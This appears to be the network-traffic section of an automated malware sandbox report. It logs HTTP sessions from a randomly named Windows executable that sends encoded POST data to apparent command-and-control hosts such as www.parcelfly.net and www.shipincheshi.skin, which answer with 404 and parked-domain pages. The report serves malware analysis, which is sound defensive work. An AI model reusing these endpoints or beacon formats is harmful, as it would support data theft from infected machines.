                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                                  Sep 16, 2024 09:40:11.717679024 CEST1236INData Raw: 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20
                                                  Data Ascii: .2s54.7-28 117.5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d=
                                                  Sep 16, 2024 09:40:11.717694044 CEST1236INData Raw: 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38
                                                  Data Ascii: class="st2" d="M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
                                                  Sep 16, 2024 09:40:11.717708111 CEST1236INData Raw: 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                  Data Ascii: .2h3z"/> <path class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <p
                                                  Sep 16, 2024 09:40:11.717724085 CEST896INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22
                                                  Data Ascii: > <path class="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                                                  Sep 16, 2024 09:40:11.717739105 CEST1236INData Raw: 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36
                                                  Data Ascii: s="st2" d="M710 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-
                                                  Sep 16, 2024 09:40:11.717753887 CEST224INData Raw: 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20
                                                  Data Ascii: <path class="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6
                                                  Sep 16, 2024 09:40:11.717767000 CEST1236INData Raw: 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70
                                                  Data Ascii: .8 25.2h3z"/> <path class="st2" d="M-390.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-380.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8
                                                  Sep 16, 2024 09:40:11.717782021 CEST224INData Raw: 22 20 64 3d 22 4d 2d 31 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 38 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c
                                                  Data Ascii: " d="M-190.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-180.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-170.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/>
                                                  Sep 16, 2024 09:40:11.718167067 CEST1236INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d
                                                  Data Ascii: <path class="st2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <pa
                                                  Sep 16, 2024 09:40:11.722666979 CEST1236INData Raw: 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38
                                                  Data Ascii: th class="st2" d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  25192.168.2.54973784.32.84.32802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:24.971071005 CEST785OUTPOST /n59g/ HTTP/1.1
                                                  Host: www.parcelfly.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.parcelfly.net
                                                  Referer: http://www.parcelfly.net/n59g/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 30 72 50 6b 31 67 36 38 4e 31 5a 33 4f 57 33 6a 38 4c 73 73 6c 67 66 58 77 55 70 69 2b 6e 68 44 37 53 65 57 4b 30 63 2f 34 61 32 37 32 64 61 55 46 79 7a 65 32 46 5a 61 57 57 58 38 69 6b 6d 77 7a 7a 71 6a 6b 72 6d 67 73 6f 34 44 41 57 72 66 39 34 34 76 70 74 48 77 32 73 4b 6c 37 32 50 71 39 43 53 46 44 4a 68 30 51 35 74 74 55 4c 70 54 59 70 39 4b 4f 38 58 4b 6d 42 44 41 6b 51 49 74 4f 31 6c 75 2f 64 30 59 66 7a 70 31 31 76 68 36 39 76 51 46 33 68 6b 63 31 30 55 51 6b 49 61 47 53 72 6f 5a 4f 7a 79 65 4f 4d 62 59 34 6a 36 75 6e 7a 4e 4f 66 50 68 64 5a 67 78 55 76 6b 79 63 4f 6f 4b 6d 36 6a 45 3d
                                                  Data Ascii: prutfR_P=0rPk1g68N1Z3OW3j8LsslgfXwUpi+nhD7SeWK0c/4a272daUFyze2FZaWWX8ikmwzzqjkrmgso4DAWrf944vptHw2sKl72Pq9CSFDJh0Q5ttULpTYp9KO8XKmBDAkQItO1lu/d0Yfzp11vh69vQF3hkc10UQkIaGSroZOzyeOMbY4j6unzNOfPhdZgxUvkycOoKm6jE=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  26192.168.2.54973884.32.84.32802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:27.515270948 CEST805OUTPOST /n59g/ HTTP/1.1
                                                  Host: www.parcelfly.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.parcelfly.net
                                                  Referer: http://www.parcelfly.net/n59g/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 30 72 50 6b 31 67 36 38 4e 31 5a 33 63 6e 48 6a 35 6f 55 73 6e 41 66 57 31 55 70 69 77 33 68 48 37 53 43 57 4b 78 6b 76 34 6f 69 37 33 38 71 55 45 33 50 65 78 46 5a 61 5a 32 57 32 6d 6b 6d 72 7a 30 6a 41 6b 70 79 67 73 6f 63 44 41 54 58 66 39 4c 51 73 70 39 48 79 35 4d 4b 6e 31 57 50 71 39 43 53 46 44 4a 63 76 51 36 64 74 56 36 5a 54 4b 37 46 46 48 63 58 4c 68 42 44 41 67 51 49 68 4f 31 6c 63 2f 59 51 79 66 78 68 31 31 76 78 36 38 39 30 45 38 68 6b 53 37 55 56 35 33 4b 4c 65 54 35 39 4a 52 52 44 41 57 75 6a 74 39 56 58 45 39 52 46 6d 4d 76 4e 6c 4a 7a 35 6a 2b 55 54 31 55 4c 61 57 6b 30 54 45 57 64 59 31 31 4d 4d 4f 72 74 4f 37 71 56 56 62 7a 64 43 74
                                                  Data Ascii: prutfR_P=0rPk1g68N1Z3cnHj5oUsnAfW1Upiw3hH7SCWKxkv4oi738qUE3PexFZaZ2W2mkmrz0jAkpygsocDATXf9LQsp9Hy5MKn1WPq9CSFDJcvQ6dtV6ZTK7FFHcXLhBDAgQIhO1lc/YQyfxh11vx6890E8hkS7UV53KLeT59JRRDAWujt9VXE9RFmMvNlJz5j+UT1ULaWk0TEWdY11MMOrtO7qVVbzdCt


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  27192.168.2.54973984.32.84.32802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:30.062365055 CEST1822OUTPOST /n59g/ HTTP/1.1
                                                  Host: www.parcelfly.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.parcelfly.net
                                                  Referer: http://www.parcelfly.net/n59g/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 30 72 50 6b 31 67 36 38 4e 31 5a 33 63 6e 48 6a 35 6f 55 73 6e 41 66 57 31 55 70 69 77 33 68 48 37 53 43 57 4b 78 6b 76 34 6f 36 37 32 4b 65 55 46 55 6e 65 77 46 5a 61 55 57 57 31 6d 6b 6e 78 7a 79 4c 63 6b 70 2b 61 73 71 55 44 42 78 50 66 37 36 51 73 6d 39 48 79 68 4d 4b 6d 37 32 4f 79 39 43 43 4a 44 4a 73 76 51 36 64 74 56 34 42 54 4a 70 39 46 4c 38 58 4b 6d 42 44 48 6b 51 4a 30 4f 78 78 6d 2f 59 55 49 65 42 42 31 31 4f 42 36 2f 4f 51 45 31 68 6b 51 38 55 56 68 33 4b 48 2f 54 35 77 6c 52 52 62 6d 57 74 7a 74 38 7a 57 38 69 56 5a 37 59 74 64 54 4f 78 78 77 6a 79 54 45 62 35 4b 37 76 6d 2f 61 56 75 30 66 31 49 30 51 75 64 32 32 31 55 5a 64 79 74 72 52 53 42 62 37 4d 63 54 53 33 53 6c 2f 4a 58 4a 34 49 4e 70 34 6d 44 59 70 70 54 69 6b 2b 4c 2b 61 31 47 2f 6f 73 64 36 6c 7a 31 32 4a 56 2f 4e 37 45 57 61 30 2f 66 52 67 70 68 4c 38 2f 78 6b 75 77 76 65 68 6a 5a 57 37 66 42 52 42 34 34 75 50 4d 59 6d 69 50 4b 6c 69 65 75 67 59 64 51 74 65 70 62 46 56 75 76 51 61 42 4a 65 4e 33 [TRUNCATED]
                                                  Data Ascii: prutfR_P=0rPk1g68N1Z3cnHj5oUsnAfW1Upiw3hH7SCWKxkv4o672KeUFUnewFZaUWW1mknxzyLckp+asqUDBxPf76Qsm9HyhMKm72Oy9CCJDJsvQ6dtV4BTJp9FL8XKmBDHkQJ0Oxxm/YUIeBB11OB6/OQE1hkQ8UVh3KH/T5wlRRbmWtzt8zW8iVZ7YtdTOxxwjyTEb5K7vm/aVu0f1I0Qud221UZdytrRSBb7McTS3Sl/JXJ4INp4mDYppTik+L+a1G/osd6lz12JV/N7EWa0/fRgphL8/xkuwvehjZW7fBRB44uPMYmiPKlieugYdQtepbFVuvQaBJeN3zcrqK7i4/ZmV8xP0oKV1WOok3YpV7a4JOHsPi/ETgMnABsMCzhon5YICqYmywW41H5Gql0OIhHeVEMdLL/Mj+0e9L1BcEe2QkYE7o0Y0++bsNtnGLUm8Bju02fXDRBltm3YwFulFnBhhyEg+6niYErQAyRqxUnFDYtYU8ju8KOmiwetYs0ZavFIMOT5iJk8WriMZaOAd0Z6vSjSe1hXPnEhQJRcelAbax6Wf9HzU7bsdtaFB7QIrtDDa/K6irlXHkfhunW3up/FU7/izZRL/3FJLY66sL0nHLAhLwu+P0CE0TkNfXPmhwb/p3ZU4QHzo33ZALJM5C3jE9019prvmO6qooxguuKjzmHQITCZ2a5z3GXkIAJgBMpMUqtJ0iEzs3vgpma8ErRxnmGQumMHBOobYVyMcfsu17aK9WqIkh2fBx5P0Q+TJWvLAgXpefuFgZuT6P+LLc5k9t7FnneCxqWbsvtN6kFvRBW3t9xkGJDjp2qulLzcDm5y1IqIo+yqmwIRXVeqH+Mlcn0WD+Rl6cq9WrIJ7gmV27NSOuxBP0iGWM7QNXRM2LVxadsYhC7LUoIUwhMbQckEHSuV3pmARrFNW9j9ZoAkLIcW6cMh5KNp3gH1lxHY1lQytQZKI/JSlFqzjG3pG8j/V5w4r83xXZG3BjunRHrbQDx [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  28192.168.2.54974084.32.84.32802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:32.607336044 CEST525OUTGET /n59g/?prutfR_P=5pnE2UHiCW8ObGXSgpx/iGO8gW0d7AEBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ha7dmOKO9m7V5QX/Ut0iNssFIOAJa+JBBsuFpAHajyYobg==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.parcelfly.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:40:33.098380089 CEST1236INHTTP/1.1 200 OK
                                                  Server: hcdn
                                                  Date: Mon, 16 Sep 2024 07:40:33 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 10072
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  alt-svc: h3=":443"; ma=86400
                                                  x-hcdn-request-id: f58a9bd775a1fbe75eb05c8b5603e7f1-bos-edge2
                                                  Expires: Mon, 16 Sep 2024 07:40:32 GMT
                                                  Cache-Control: no-cache
                                                  Accept-Ranges: bytes
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                  Sep 16, 2024 09:40:33.098412991 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                  Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                  Sep 16, 2024 09:40:33.098427057 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                  Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                  Sep 16, 2024 09:40:33.098520994 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                  Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                  Sep 16, 2024 09:40:33.098532915 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                  Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                  Sep 16, 2024 09:40:33.098545074 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                  Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                  Sep 16, 2024 09:40:33.098555088 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                  Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                  Sep 16, 2024 09:40:33.098592043 CEST1236INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                  Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                                  Sep 16, 2024 09:40:33.098603010 CEST524INData Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                                                  Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  29192.168.2.549741154.23.176.197802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:47.215579987 CEST797OUTPOST /0vb3/ HTTP/1.1
                                                  Host: www.shipincheshi.skin
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.shipincheshi.skin
                                                  Referer: http://www.shipincheshi.skin/0vb3/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
